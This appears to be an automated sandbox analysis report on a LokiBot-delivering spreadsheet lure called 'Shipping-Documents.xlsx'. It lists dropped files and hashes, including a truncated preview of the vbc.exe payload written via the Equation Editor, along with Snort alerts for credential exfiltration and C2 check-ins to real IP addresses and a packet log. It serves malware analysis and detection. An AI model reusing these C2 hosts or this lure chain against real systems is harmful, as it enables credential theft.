SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB863104.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck Download File
Process:	C:\Users\Public\vbc.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	598
Entropy (8bit):	0.6390116820665388
Encrypted:	false
SSDEEP:	3:/lbWwWvllbWwWvllbWwWvllbWwWvllbWwWvllbWwWvllbWwWl:seeeeeeZ
MD5:	E34D74806A224083D4011C3BED51D210
SHA1:	5F801AC445BAB225AD54C6875B1CAA13DC64BAD8
SHA-256:	36B1C45B1C4DF82A82C9F6E40AE8746549ECF0957E92FD968516ECD4BA57C45F
SHA-512:	E88FF1C1159BA47052C5889A9CCC1F0385877515E66695D91F8FD7541007D643E031B22AA18B429B303A271E848DBD74017625666A1D303C04544D01B8C975D3
Malicious:	false
Preview:	........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

C:\Users\user\Desktop\~$Shipping-Documents.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	761856
Entropy (8bit):	7.601403838460658
Encrypted:	false
SSDEEP:	12288:88zqLMOeSMxvquwaHpCwQqc6n2R8Uncvc6t8TSx+f5SSruwsr4Z4:zOgfquPHpCwQqRTTt88KSKNsrJ
MD5:	7146B0D2CAED6422C289A08F63A5C685
SHA1:	2666D058EA4E4A2CA5BC6E5EA75594E68FC63F1B
SHA-256:	25AA6393CACFF94544387CC515F754DFD2AF133612A74FD84B64C6E17354D1ED
SHA-512:	F0B3098F20A22095397AB88348ECFE0911B126739005C9B70A815543BE04465603D3ED0C070BA50488C88FE13B9470D003C114254941593BA20F4511CB01CC47
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.`................................ ........@.. ....................................@.....................................K.......,...........................?................................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........&..h...........P,.............................................j+.&.(....(....(.....o......0..........+.&.+.&. .....9S...&..(....8....& ....8;.....(.... ....8.....(.... ....8......(....8.... ............E................................/... ....(....:....&..(.....(....9s...& .....9....&.V+.&..(....(....(......V+.&..(....o#...(.......+.&....+.&...J+.&.........(.....J+.&.........(.....J+.&.........(.....J+.&.........(......+.&..(....:+.&.....o!...*.J+.&....

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.995662263943651
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Shipping-Documents.xlsx
File size:	1359872
MD5:	20e540ed9d02f60f7fb928ed8fe60f1f
SHA1:	afa6c289fbeed004fe3a52c666cf32a8ae444e79
SHA256:	3c48a312d69b2d72bec8b3dad17e99ee1241afff875e97b73569509d5f8b07ec
SHA512:	1f1aed88494f999628457d75b3f1097bd1b05c48610ce09c96e827a34c1f81f8ef40a46027404cc050545258dfc290fd024923a73bd880019d95bbec27035fb5
SSDEEP:	24576:dHM2lbcLvEgwCf3okSoDsM0J+MC0MhXWc3zfSl2dz5QEYLiHjlkIh5cM07ZP:d2Lcgws3eooMQ+zNhGaza85Jlk018x
File Content Preview:	........................>.......................................................................................................\|.......~...............z......................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Shipping-Documents.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1345224

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1345224
Entropy:	7.99980515236
Base64 Encoded:	True
Data ASCII:	. . . . . . . . O . . ; . v i . . . . Z . & R . _ ; . . . . ! . . . ! . . . . . . . f m . x . . . . . . . . . q . : . A . ^ $ . h . . ( . . > . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ .
Data Raw:	b7 86 14 00 00 00 00 00 4f bf fc 3b 1b 76 69 fe a8 9b 7f 5a 9f 26 52 fe 5f 3b fd d2 b5 8d 21 a5 c4 da 21 f9 ac c6 ff e5 fd f0 66 6d 87 78 8a d9 8a d9 0e e5 f7 81 a9 71 cb 3a cb 41 f5 5e 24 85 68 ee c6 28 8a fa 3e 02 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.56563786614
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . c . . . . . & . . 2 B e . . . 2 . . k . 0 . . . l O . w . x . . . . . . 0 . u D . . . k . . 7 . . . - X . T . . < . . . . . . . c . . [
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/16/21-12:29:47.751148	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49168	80	192.168.2.22	63.141.228.141
06/16/21-12:29:47.751148	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49168	80	192.168.2.22	63.141.228.141
06/16/21-12:29:47.751148	TCP	2025381	ET TROJAN LokiBot Checkin	49168	80	192.168.2.22	63.141.228.141
06/16/21-12:29:47.751148	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49168	80	192.168.2.22	63.141.228.141
06/16/21-12:29:48.840134	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49169	80	192.168.2.22	63.141.228.141
06/16/21-12:29:48.840134	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49169	80	192.168.2.22	63.141.228.141
06/16/21-12:29:48.840134	TCP	2025381	ET TROJAN LokiBot Checkin	49169	80	192.168.2.22	63.141.228.141
06/16/21-12:29:48.840134	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49169	80	192.168.2.22	63.141.228.141
06/16/21-12:29:49.987019	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49170	80	192.168.2.22	63.141.228.141
06/16/21-12:29:49.987019	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49170	80	192.168.2.22	63.141.228.141
06/16/21-12:29:49.987019	TCP	2025381	ET TROJAN LokiBot Checkin	49170	80	192.168.2.22	63.141.228.141
06/16/21-12:29:49.987019	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49170	80	192.168.2.22	63.141.228.141
06/16/21-12:29:51.153026	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49171	80	192.168.2.22	63.141.228.141
06/16/21-12:29:51.153026	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49171	80	192.168.2.22	63.141.228.141
06/16/21-12:29:51.153026	TCP	2025381	ET TROJAN LokiBot Checkin	49171	80	192.168.2.22	63.141.228.141
06/16/21-12:29:51.153026	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49171	80	192.168.2.22	63.141.228.141

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 16, 2021 12:29:38.771471977 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.016647100 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.016779900 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.017275095 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.263397932 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.263458967 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.263478041 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.263520002 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.263636112 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.263788939 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.508369923 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.508416891 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.508446932 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.508479118 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.508508921 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.508539915 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.508569002 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.508569002 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.508589983 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.508593082 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.508594990 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.508605957 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.508641005 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.753947973 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754000902 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754154921 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.754188061 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754226923 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.754271030 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754308939 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.754405975 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754440069 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.754513025 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754549980 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.754681110 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754717112 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.754734039 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754769087 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.754874945 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754921913 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.754954100 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.754998922 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.755079985 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.755127907 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.755218029 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.755264997 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.755294085 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.755332947 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.755394936 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.755429983 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.755485058 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.755520105 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.755530119 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.755553007 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.758675098 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.998930931 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.998970032 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999012947 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999043941 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999056101 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999069929 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999088049 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999090910 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999105930 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999106884 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999149084 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999155998 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999187946 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999197960 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999221087 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999221087 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999253035 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999262094 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999284029 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999286890 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999313116 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999334097 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999346972 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999349117 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999377012 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999386072 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999408007 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999413013 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999444008 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999449015 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999469042 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999486923 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999501944 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999516010 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999532938 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999568939 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999573946 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999587059 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999617100 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999622107 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999650955 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999650955 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999682903 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999686956 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999715090 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999717951 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999747038 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999747992 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999779940 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999780893 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999811888 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999814987 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999845982 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999845982 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999878883 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999878883 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999911070 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:39.999914885 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:39.999948025 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.003794909 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.244710922 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.244775057 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.244820118 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.244853020 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.244879961 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.244887114 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.244915962 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.244920015 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.244921923 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.244923115 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.244951963 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.244956970 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.244988918 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.244990110 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245018005 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245028973 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245064974 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245079041 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245093107 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245102882 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245131969 CEST	49167	80	192.168.2.22	103.89.90.94
